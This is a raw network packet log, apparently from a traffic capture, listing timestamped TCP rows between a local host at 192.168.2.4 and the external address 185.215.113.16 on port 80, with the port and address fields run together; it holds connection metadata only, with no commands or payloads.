                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.926093102 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.926103115 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.926104069 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.926117897 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.926124096 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.926153898 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.927278042 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.927293062 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.927337885 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.927810907 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.927851915 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.927922010 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.927961111 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.929023981 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.929173946 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.929212093 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.929227114 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.930160999 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.930227041 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.930289030 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.930401087 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.931401968 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.931443930 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.931539059 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.932591915 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.932621002 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.932635069 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.932707071 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.932745934 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.933788061 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.933851957 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.933891058 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.933953047 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.934977055 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.935018063 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.935095072 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.935128927 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.936259031 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.936346054 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.936366081 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.936463118 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.937360048 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.937401056 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.937479019 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.937532902 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.938664913 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.938723087 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.938731909 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.938803911 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.939739943 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.939791918 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.939840078 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.939887047 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.941093922 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.941164017 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.941252947 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.941294909 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.945024014 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.945038080 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.945050955 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.945065022 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.945070982 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.945091963 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.945112944 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.945175886 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.945213079 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.945349932 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.945427895 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.946513891 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.946574926 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.946698904 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.946744919 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.947592974 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.947652102 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.947777033 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.947952032 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.948784113 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.948831081 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.948950052 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.949023008 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.950006962 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.950066090 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.950171947 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.950252056 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.951342106 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.951358080 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.951383114 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.951397896 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.952406883 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.952462912 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.952579975 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.952624083 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.953670979 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.953692913 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.953732014 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.954693079 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.954735994 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.084104061 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.084130049 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.084211111 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.084211111 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.084558010 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.084609032 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.084619045 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.084672928 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.085757971 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.085819006 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.085820913 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.085855007 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.086936951 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.086981058 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.087033033 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.087146997 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.088131905 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.088191986 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.088238001 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.088279009 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.089333057 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.089396954 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.089430094 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.089617014 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.090532064 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.090590954 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.090622902 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.090660095 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.091742039 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.091801882 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.091833115 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.091917992 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.092931986 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.092977047 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.092983007 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.093022108 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.094124079 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.094172001 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.094252110 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.094290018 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.095340967 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.095381975 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.095412970 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.095451117 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.096512079 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.096565008 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.096626043 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.096667051 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.097784042 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.097826004 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.097863913 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.097927094 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.098922014 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.098968029 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.099056959 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.099168062 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.100107908 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.100186110 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.100229025 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.100311995 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.101295948 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.101353884 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.101385117 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.101425886 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.102494955 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.102561951 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.102606058 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.102689981 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.103657961 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.103709936 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.103766918 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.103825092 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.104892015 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.104912996 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.104976892 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.104976892 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.106067896 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.106125116 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.106172085 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.106275082 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.107300043 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.107383013 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.107428074 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.108437061 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.108546972 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.108596087 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.109642982 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.109747887 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.109797001 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.110984087 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.111057997 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.111109018 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.112041950 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.112174988 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.112221956 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.113249063 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.113302946 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.113334894 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.114433050 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.114489079 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.114530087 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.115632057 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.115689993 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.115753889 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.116866112 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.116899967 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.116921902 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.116931915 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.118060112 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.118103981 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.118155003 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.119225025 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.119333029 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.119385004 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.120404005 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.120543003 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.120589972 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.121692896 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.121776104 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.121829987 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.122812033 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.122857094 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.122880936 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.122989893 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.124013901 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.124087095 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.124135017 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.125175953 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.125318050 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.125364065 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.126493931 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.126552105 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.126597881 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.127604961 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.127706051 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.127747059 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.128787994 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.128833055 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.128886938 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.129970074 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.130017996 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.130079031 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.130585909 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.131175041 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.131268978 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.131320953 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.132350922 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.132514954 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.132561922 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.133574963 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.133621931 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.133658886 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.134795904 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.134844065 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.134852886 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.134900093 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.135922909 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.136018991 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.136068106 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.137128115 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.137265921 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.137314081 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.138353109 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.138396978 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.138441086 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.139259100 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.139532089 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.139573097 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.139625072 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.139664888 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.140717983 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.140773058 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.140818119 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.141949892 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.142096043 CET8049814185.215.113.16192.168.2.4
